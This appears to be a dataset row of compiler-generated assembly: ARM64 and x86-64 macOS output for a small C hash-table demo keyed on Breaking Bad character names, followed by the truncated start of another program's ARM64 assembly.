cset w8, eq
tbnz w8, #0, LBB6_10
b LBB6_9
LBB6_9:
bl ___stack_chk_fail
LBB6_10:
mov w0, #0
add sp, sp, #2512
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
ldp x28, x27, [sp], #32 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.comm _hash_table,80,3 ; @hash_table
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "---Start---\n"
l_.str.1: ; @.str.1
.asciz "\t%d\t---\n"
l_.str.2: ; @.str.2
.asciz "\t%d\t---<deleted>\n"
l_.str.3: ; @.str.3
.asciz "\t%d\t%s\n"
l_.str.4: ; @.str.4
.asciz "---End-----\n"
l_.str.5: ; @.str.5
.asciz "Walt -> %u\n"
l_.str.6: ; @.str.6
.asciz "Walt"
l_.str.7: ; @.str.7
.asciz "Skyler -> %u\n"
l_.str.8: ; @.str.8
.asciz "Skyler"
l_.str.9: ; @.str.9
.asciz "Saul -> %u\n"
l_.str.10: ; @.str.10
.asciz "Saul"
l_.str.11: ; @.str.11
.asciz "Mike -> %u\n"
l_.str.12: ; @.str.12
.asciz "Mike"
l_.str.13: ; @.str.13
.asciz "Hank -> %u\n"
l_.str.14: ; @.str.14
.asciz "Hank"
l_.str.15: ; @.str.15
.asciz "Mary -> %u\n"
l_.str.16: ; @.str.16
.asciz "Mary"
l_.str.17: ; @.str.17
.asciz "Holy -> %u\n"
l_.str.18: ; @.str.18
.asciz "Holy"
l_.str.19: ; @.str.19
.asciz "Jessie -> %u\n"
l_.str.20: ; @.str.20
.asciz "Jessie"
l_.str.21: ; @.str.21
.asciz "Todd -> %u\n"
l_.str.22: ; @.str.22
.asciz "Todd"
.section __TEXT,__const
.p2align 2 ; @__const.main.Skyler
l___const.main.Skyler:
.asciz "Skyler\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
.long 27 ; 0x1b
.p2align 2 ; @__const.main.Jessie
l___const.main.Jessie:
.asciz "Jessie\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
.long 33 ; 0x21
.section __TEXT,__cstring,cstring_literals
l_.str.23: ; @.str.23
.asciz "Not Found!\n"
l_.str.24: ; @.str.24
.asciz "%s is at the address of %p\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _hash ## -- Begin function hash
.p2align 4, 0x90
_hash: ## @hash
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rdi
movl $256, %esi ## imm = 0x100
callq _strnlen
## kill: def $eax killed $eax killed $rax
movl %eax, -12(%rbp)
movl $0, -16(%rbp)
movl $0, -20(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movl -20(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB0_4
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movslq -20(%rbp), %rcx
movsbl (%rax,%rcx), %eax
addl -16(%rbp), %eax
movl %eax, -16(%rbp)
movl -16(%rbp), %eax
movq -8(%rbp), %rcx
movslq -20(%rbp), %rdx
movsbl (%rcx,%rdx), %ecx
imull %ecx, %eax
movl $10, %ecx
xorl %edx, %edx
divl %ecx
movl %edx, -16(%rbp)
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB0_1
LBB0_4:
movl -16(%rbp), %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _init_hash_table ## -- Begin function init_hash_table
.p2align 4, 0x90
_init_hash_table: ## @init_hash_table
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl $0, -4(%rbp)
LBB1_1: ## =>This Inner Loop Header: Depth=1
cmpl $10, -4(%rbp)
jge LBB1_4
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
movslq -4(%rbp), %rcx
movq _hash_table@GOTPCREL(%rip), %rax
movq $0, (%rax,%rcx,8)
## %bb.3: ## in Loop: Header=BB1_1 Depth=1
movl -4(%rbp), %eax
addl $1, %eax
movl %eax, -4(%rbp)
jmp LBB1_1
LBB1_4:
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _print_table ## -- Begin function print_table
.p2align 4, 0x90
_print_table: ## @print_table
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -4(%rbp)
LBB2_1: ## =>This Inner Loop Header: Depth=1
cmpl $10, -4(%rbp)
jge LBB2_10
## %bb.2: ## in Loop: Header=BB2_1 Depth=1
movslq -4(%rbp), %rcx
movq _hash_table@GOTPCREL(%rip), %rax
cmpq $0, (%rax,%rcx,8)
jne LBB2_4
## %bb.3: ## in Loop: Header=BB2_1 Depth=1
movl -4(%rbp), %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB2_8
LBB2_4: ## in Loop: Header=BB2_1 Depth=1
movslq -4(%rbp), %rcx
movl $1048575, %edx ## imm = 0xFFFFF
movq _hash_table@GOTPCREL(%rip), %rax
cmpq %rdx, (%rax,%rcx,8)
jne LBB2_6
## %bb.5: ## in Loop: Header=BB2_1 Depth=1
movl -4(%rbp), %esi
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB2_7
LBB2_6: ## in Loop: Header=BB2_1 Depth=1
movl -4(%rbp), %esi
movslq -4(%rbp), %rcx
movq _hash_table@GOTPCREL(%rip), %rax
movq (%rax,%rcx,8), %rdx
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
LBB2_7: ## in Loop: Header=BB2_1 Depth=1
jmp LBB2_8
LBB2_8: ## in Loop: Header=BB2_1 Depth=1
jmp LBB2_9
LBB2_9: ## in Loop: Header=BB2_1 Depth=1
movl -4(%rbp), %eax
addl $1, %eax
movl %eax, -4(%rbp)
jmp LBB2_1
LBB2_10:
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _hash_table_insert ## -- Begin function hash_table_insert
.p2align 4, 0x90
_hash_table_insert: ## @hash_table_insert
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -16(%rbp)
movq -16(%rbp), %rdi
callq _hash
movl %eax, -20(%rbp)
movl $0, -24(%rbp)
LBB3_1: ## =>This Inner Loop Header: Depth=1
cmpl $10, -24(%rbp)
jge LBB3_7
## %bb.2: ## in Loop: Header=BB3_1 Depth=1
movl -24(%rbp), %eax
addl -20(%rbp), %eax
movl $10, %ecx
cltd
idivl %ecx
movl %edx, -28(%rbp)
movslq -28(%rbp), %rcx
movq _hash_table@GOTPCREL(%rip), %rax
cmpq $0, (%rax,%rcx,8)
je LBB3_4
## %bb.3: ## in Loop: Header=BB3_1 Depth=1
movslq -28(%rbp), %rcx
movl $1048575, %edx ## imm = 0xFFFFF
movq _hash_table@GOTPCREL(%rip), %rax
cmpq %rdx, (%rax,%rcx,8)
jne LBB3_5
LBB3_4:
movq -16(%rbp), %rdx
movslq -28(%rbp), %rcx
movq _hash_table@GOTPCREL(%rip), %rax
movq %rdx, (%rax,%rcx,8)
movb $1, -1(%rbp)
jmp LBB3_8
LBB3_5: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_6
LBB3_6: ## in Loop: Header=BB3_1 Depth=1
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB3_1
LBB3_7:
movb $0, -1(%rbp)
LBB3_8:
movb -1(%rbp), %al
andb $1, %al
movzbl %al, %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _hash_table_lookup ## -- Begin function hash_table_lookup
.p2align 4, 0x90
_hash_table_lookup: ## @hash_table_lookup
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -16(%rbp)
movq -16(%rbp), %rdi
callq _hash
movl %eax, -20(%rbp)
movl $0, -24(%rbp)
LBB4_1: ## =>This Inner Loop Header: Depth=1
cmpl $10, -24(%rbp)
jge LBB4_10
## %bb.2: ## in Loop: Header=BB4_1 Depth=1
movl -24(%rbp), %eax
addl -20(%rbp), %eax
movl $10, %ecx
cltd
idivl %ecx
movl %edx, -28(%rbp)
movslq -28(%rbp), %rcx
movq _hash_table@GOTPCREL(%rip), %rax
cmpq $0, (%rax,%rcx,8)
jne LBB4_4
## %bb.3:
movq $0, -8(%rbp)
jmp LBB4_11
LBB4_4: ## in Loop: Header=BB4_1 Depth=1
movslq -28(%rbp), %rcx
movl $1048575, %edx ## imm = 0xFFFFF
movq _hash_table@GOTPCREL(%rip), %rax
cmpq %rdx, (%rax,%rcx,8)
jne LBB4_6
## %bb.5: ## in Loop: Header=BB4_1 Depth=1
jmp LBB4_9
LBB4_6: ## in Loop: Header=BB4_1 Depth=1
movslq -28(%rbp), %rcx
movq _hash_table@GOTPCREL(%rip), %rax
movq (%rax,%rcx,8), %rdi
movq -16(%rbp), %rsi
movl $10, %edx
callq _strncmp
cmpl $0, %eax
jne LBB4_8
## %bb.7:
movslq -28(%rbp), %rcx
movq _hash_table@GOTPCREL(%rip), %rax
movq (%rax,%rcx,8), %rax
movq %rax, -8(%rbp)
jmp LBB4_11
LBB4_8: ## in Loop: Header=BB4_1 Depth=1
jmp LBB4_9
LBB4_9: ## in Loop: Header=BB4_1 Depth=1
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB4_1
LBB4_10:
movq $0, -8(%rbp)
LBB4_11:
movq -8(%rbp), %rax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _hash_table_delete ## -- Begin function hash_table_delete
.p2align 4, 0x90
_hash_table_delete: ## @hash_table_delete
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq %rdi, -16(%rbp)
movq -16(%rbp), %rdi
callq _hash
movl %eax, -20(%rbp)
movl $0, -24(%rbp)
LBB5_1: ## =>This Inner Loop Header: Depth=1
cmpl $10, -24(%rbp)
jge LBB5_10
## %bb.2: ## in Loop: Header=BB5_1 Depth=1
movl -24(%rbp), %eax
addl -20(%rbp), %eax
movl $10, %ecx
cltd
idivl %ecx
movl %edx, -28(%rbp)
movslq -28(%rbp), %rcx
movq _hash_table@GOTPCREL(%rip), %rax
cmpq $0, (%rax,%rcx,8)
jne LBB5_4
## %bb.3:
movq $0, -8(%rbp)
jmp LBB5_11
LBB5_4: ## in Loop: Header=BB5_1 Depth=1
movslq -28(%rbp), %rcx
movl $1048575, %edx ## imm = 0xFFFFF
movq _hash_table@GOTPCREL(%rip), %rax
cmpq %rdx, (%rax,%rcx,8)
jne LBB5_6
## %bb.5: ## in Loop: Header=BB5_1 Depth=1
jmp LBB5_9
LBB5_6: ## in Loop: Header=BB5_1 Depth=1
movslq -28(%rbp), %rcx
movq _hash_table@GOTPCREL(%rip), %rax
movq (%rax,%rcx,8), %rdi
movq -16(%rbp), %rsi
movl $10, %edx
callq _strncmp
cmpl $0, %eax
jne LBB5_8
## %bb.7:
movslq -28(%rbp), %rcx
movq _hash_table@GOTPCREL(%rip), %rax
movq (%rax,%rcx,8), %rax
movq %rax, -40(%rbp)
movslq -28(%rbp), %rcx
movq _hash_table@GOTPCREL(%rip), %rax
movl $1048575, %edx ## imm = 0xFFFFF
movq %rdx, (%rax,%rcx,8)
movq -40(%rbp), %rax
movq %rax, -8(%rbp)
jmp LBB5_11
LBB5_8: ## in Loop: Header=BB5_1 Depth=1
jmp LBB5_9
LBB5_9: ## in Loop: Header=BB5_1 Depth=1
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB5_1
LBB5_10:
movq $0, -8(%rbp)
LBB5_11:
movq -8(%rbp), %rax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $2400, %rsp ## imm = 0x960
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -2388(%rbp)
callq _init_hash_table
leaq L_.str.6(%rip), %rdi
callq _hash
movl %eax, %esi
leaq L_.str.5(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.8(%rip), %rdi
callq _hash
movl %eax, %esi
leaq L_.str.7(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.10(%rip), %rdi
callq _hash
movl %eax, %esi
leaq L_.str.9(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.12(%rip), %rdi
callq _hash
movl %eax, %esi
leaq L_.str.11(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.14(%rip), %rdi
callq _hash
movl %eax, %esi
leaq L_.str.13(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.16(%rip), %rdi
callq _hash
movl %eax, %esi
leaq L_.str.15(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.18(%rip), %rdi
callq _hash
movl %eax, %esi
leaq L_.str.17(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.20(%rip), %rdi
callq _hash
movl %eax, %esi
leaq L_.str.19(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.22(%rip), %rdi
callq _hash
movl %eax, %esi
leaq L_.str.21(%rip), %rdi
movb $0, %al
callq _printf
leaq -272(%rbp), %rdi
xorl %esi, %esi
movl $260, %edx ## imm = 0x104
callq _memset
movb $87, -272(%rbp)
movb $97, -271(%rbp)
movb $108, -270(%rbp)
movb $116, -269(%rbp)
movl $26, -16(%rbp)
leaq -536(%rbp), %rdi
leaq l___const.main.Skyler(%rip), %rsi
movl $260, %edx ## imm = 0x104
callq _memcpy
leaq -800(%rbp), %rdi
xorl %esi, %esi
movl $260, %edx ## imm = 0x104
callq _memset
movb $83, -800(%rbp)
movb $97, -799(%rbp)
movb $117, -798(%rbp)
movb $108, -797(%rbp)
movl $28, -544(%rbp)
leaq -1064(%rbp), %rdi
xorl %esi, %esi
movl $260, %edx ## imm = 0x104
callq _memset
movb $77, -1064(%rbp)
movb $105, -1063(%rbp)
movb $107, -1062(%rbp)
movb $101, -1061(%rbp)
movl $29, -808(%rbp)
leaq -1328(%rbp), %rdi
xorl %esi, %esi
movl $260, %edx ## imm = 0x104
callq _memset
movb $72, -1328(%rbp)
movb $97, -1327(%rbp)
movb $110, -1326(%rbp)
movb $107, -1325(%rbp)
movl $30, -1072(%rbp)
leaq -1592(%rbp), %rdi
xorl %esi, %esi
movl $260, %edx ## imm = 0x104
callq _memset
movb $77, -1592(%rbp)
movb $97, -1591(%rbp)
movb $114, -1590(%rbp)
movb $121, -1589(%rbp)
movl $31, -1336(%rbp)
leaq -1856(%rbp), %rdi
xorl %esi, %esi
movl $260, %edx ## imm = 0x104
callq _memset
movb $72, -1856(%rbp)
movb $111, -1855(%rbp)
movb $108, -1854(%rbp)
movb $121, -1853(%rbp)
movl $32, -1600(%rbp)
leaq -2120(%rbp), %rdi
leaq l___const.main.Jessie(%rip), %rsi
movl $260, %edx ## imm = 0x104
callq _memcpy
leaq -2384(%rbp), %rdi
xorl %esi, %esi
movl $260, %edx ## imm = 0x104
callq _memset
movb $84, -2384(%rbp)
movb $111, -2383(%rbp)
movb $100, -2382(%rbp)
movb $100, -2381(%rbp)
movl $34, -2128(%rbp)
leaq -272(%rbp), %rdi
callq _hash_table_insert
leaq -536(%rbp), %rdi
callq _hash_table_insert
leaq -800(%rbp), %rdi
callq _hash_table_insert
leaq -1064(%rbp), %rdi
callq _hash_table_insert
leaq -1328(%rbp), %rdi
callq _hash_table_insert
leaq -1592(%rbp), %rdi
callq _hash_table_insert
leaq -1856(%rbp), %rdi
callq _hash_table_insert
leaq -2120(%rbp), %rdi
callq _hash_table_insert
leaq -2384(%rbp), %rdi
callq _hash_table_insert
callq _print_table
leaq L_.str.6(%rip), %rdi
callq _hash_table_lookup
movq %rax, -2400(%rbp)
cmpq $0, -2400(%rbp)
je LBB6_2
## %bb.1:
movl $1048575, %eax ## imm = 0xFFFFF
cmpq %rax, -2400(%rbp)
jne LBB6_3
LBB6_2:
leaq L_.str.23(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB6_4
LBB6_3:
movq -2400(%rbp), %rsi
movq -2400(%rbp), %rdx
leaq L_.str.24(%rip), %rdi
movb $0, %al
callq _printf
LBB6_4:
leaq L_.str.6(%rip), %rdi
callq _hash_table_delete
leaq L_.str.6(%rip), %rdi
callq _hash_table_lookup
movq %rax, -2400(%rbp)
cmpq $0, -2400(%rbp)
je LBB6_6
## %bb.5:
movl $1048575, %eax ## imm = 0xFFFFF
cmpq %rax, -2400(%rbp)
jne LBB6_7
LBB6_6:
leaq L_.str.23(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB6_8
LBB6_7:
movq -2400(%rbp), %rsi
movq -2400(%rbp), %rdx
leaq L_.str.24(%rip), %rdi
movb $0, %al
callq _printf
LBB6_8:
callq _print_table
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB6_10
## %bb.9:
xorl %eax, %eax
addq $2400, %rsp ## imm = 0x960
popq %rbp
retq
LBB6_10:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.comm _hash_table,80,4 ## @hash_table
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "---Start---\n"
L_.str.1: ## @.str.1
.asciz "\t%d\t---\n"
L_.str.2: ## @.str.2
.asciz "\t%d\t---<deleted>\n"
L_.str.3: ## @.str.3
.asciz "\t%d\t%s\n"
L_.str.4: ## @.str.4
.asciz "---End-----\n"
L_.str.5: ## @.str.5
.asciz "Walt -> %u\n"
L_.str.6: ## @.str.6
.asciz "Walt"
L_.str.7: ## @.str.7
.asciz "Skyler -> %u\n"
L_.str.8: ## @.str.8
.asciz "Skyler"
L_.str.9: ## @.str.9
.asciz "Saul -> %u\n"
L_.str.10: ## @.str.10
.asciz "Saul"
L_.str.11: ## @.str.11
.asciz "Mike -> %u\n"
L_.str.12: ## @.str.12
.asciz "Mike"
L_.str.13: ## @.str.13
.asciz "Hank -> %u\n"
L_.str.14: ## @.str.14
.asciz "Hank"
L_.str.15: ## @.str.15
.asciz "Mary -> %u\n"
L_.str.16: ## @.str.16
.asciz "Mary"
L_.str.17: ## @.str.17
.asciz "Holy -> %u\n"
L_.str.18: ## @.str.18
.asciz "Holy"
L_.str.19: ## @.str.19
.asciz "Jessie -> %u\n"
L_.str.20: ## @.str.20
.asciz "Jessie"
L_.str.21: ## @.str.21
.asciz "Todd -> %u\n"
L_.str.22: ## @.str.22
.asciz "Todd"
.section __TEXT,__const
.p2align 2 ## @__const.main.Skyler
l___const.main.Skyler:
.asciz "Skyler\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
.long 27 ## 0x1b
.p2align 2 ## @__const.main.Jessie
l___const.main.Jessie:
.asciz "Jessie\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
.long 33 ## 0x21
.section __TEXT,__cstring,cstring_literals
L_.str.23: ## @.str.23
.asciz "Not Found!\n"
L_.str.24: ## @.str.24
.asciz "%s is at the address of %p\n"
.subsections_via_symbols
| the_stack_data/157437.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, _main.f@PAGE
add x8, x8, _main.f@PAGEOFF
add x8, x8, #504
str x8, [sp, #8] ; 8-byte Folded Spill
mov x8, #51719
movk x8, #15258, lsl #16
str x8, [sp, #16] ; 8-byte Folded Spill
stur wzr, [x29, #-4]
mov x9, sp
sub x8, x29, #8
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
adrp x9, _main.p2@PAGE
mov x8, #1
str x8, [x9, _main.p2@PAGEOFF]
mov w8, #1
stur w8, [x29, #-16]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-16]
mov w9, #16969
movk w9, #15, lsl #16
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldr x11, [sp, #16] ; 8-byte Folded Reload
ldur w8, [x29, #-16]
subs w8, w8, #1
adrp x9, _main.p2@PAGE
add x9, x9, _main.p2@PAGEOFF
ldr x8, [x9, w8, sxtw #3]
lsl x8, x8, #1
sdiv x10, x8, x11
mul x10, x10, x11
subs x8, x8, x10
ldursw x10, [x29, #-16]
str x8, [x9, x10, lsl #3]
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-16]
add w8, w8, #1
stur w8, [x29, #-16]
b LBB0_1
LBB0_4:
adrp x9, _main.p3@PAGE
mov x8, #1
str x8, [x9, _main.p3@PAGEOFF]
mov w8, #1
stur w8, [x29, #-16]
b LBB0_5
LBB0_5: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-16]
mov w9, #16969
movk w9, #15, lsl #16
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_8
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_5 Depth=1
ldr x11, [sp, #16] ; 8-byte Folded Reload
ldur w8, [x29, #-16]
subs w8, w8, #1
adrp x9, _main.p3@PAGE
add x9, x9, _main.p3@PAGEOFF
ldr x8, [x9, w8, sxtw #3]
mov x10, #3
mul x8, x8, x10
sdiv x10, x8, x11
mul x10, x10, x11
subs x8, x8, x10
ldursw x10, [x29, #-16]
str x8, [x9, x10, lsl #3]
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_5 Depth=1
ldur w8, [x29, #-16]
add w8, w8, #1
stur w8, [x29, #-16]
b LBB0_5
LBB0_8:
stur wzr, [x29, #-12]
b LBB0_9
LBB0_9: ; =>This Inner Loop Header: Depth=1
ldur w9, [x29, #-12]
mov w8, #1
lsl w8, w8, w9
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_12
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_9 Depth=1
b LBB0_11
LBB0_11: ; in Loop: Header=BB0_9 Depth=1
ldur w8, [x29, #-12]
add w8, w8, #1
stur w8, [x29, #-12]
b LBB0_9
LBB0_12:
ldr x9, [sp, #8] ; 8-byte Folded Reload
ldur w8, [x29, #-12]
subs w8, w8, #1
stur w8, [x29, #-12]
ldursw x8, [x29, #-12]
mov x10, #24
mul x10, x8, x10
mov x8, #1
str x8, [x9, x10]
ldur w8, [x29, #-12]
subs w9, w8, #1
adrp x8, _main.p2@PAGE
add x8, x8, _main.p2@PAGEOFF
ldr x8, [x8, w9, sxtw #3]
mov x9, #3
mul x8, x8, x9
ldursw x9, [x29, #-8]
subs x8, x8, x9
cset w8, gt
tbnz w8, #0, LBB0_14
b LBB0_13
LBB0_13:
ldr x10, [sp, #8] ; 8-byte Folded Reload
ldur w8, [x29, #-12]
subs w8, w8, #1
mov w9, #24
smaddl x9, w8, w9, x10
mov x8, #1
str x8, [x9, #8]
b LBB0_14
LBB0_14:
mov w8, #2
stur w8, [x29, #-16]
b LBB0_15
LBB0_15: ; =>This Loop Header: Depth=1
; Child Loop BB0_17 Depth 2
; Child Loop BB0_19 Depth 3
ldur w8, [x29, #-16]
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_26
b LBB0_16
LBB0_16: ; in Loop: Header=BB0_15 Depth=1
stur wzr, [x29, #-20]
b LBB0_17
LBB0_17: ; Parent Loop BB0_15 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB0_19 Depth 3
ldur w8, [x29, #-20]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_24
b LBB0_18
LBB0_18: ; in Loop: Header=BB0_17 Depth=2
str wzr, [sp, #24]
b LBB0_19
LBB0_19: ; Parent Loop BB0_15 Depth=1
; Parent Loop BB0_17 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #24]
subs w8, w8, #2
cset w8, ge
tbnz w8, #0, LBB0_22
b LBB0_20
LBB0_20: ; in Loop: Header=BB0_19 Depth=3
ldr x13, [sp, #16] ; 8-byte Folded Reload
ldur w8, [x29, #-16]
subs w8, w8, #1
mov x12, #504
adrp x9, _main.f@PAGE
add x9, x9, _main.f@PAGEOFF
mov x11, x9
mov w10, #504
smaddl x8, w8, w10, x11
ldursw x10, [x29, #-20]
mov x11, #24
mul x10, x10, x11
add x8, x8, x10
ldrsw x10, [sp, #24]
ldr x8, [x8, x10, lsl #3]
ldursw x10, [x29, #-8]
ldursw x14, [x29, #-20]
adrp x16, _main.p2@PAGE
add x16, x16, _main.p2@PAGEOFF
ldr x14, [x16, x14, lsl #3]
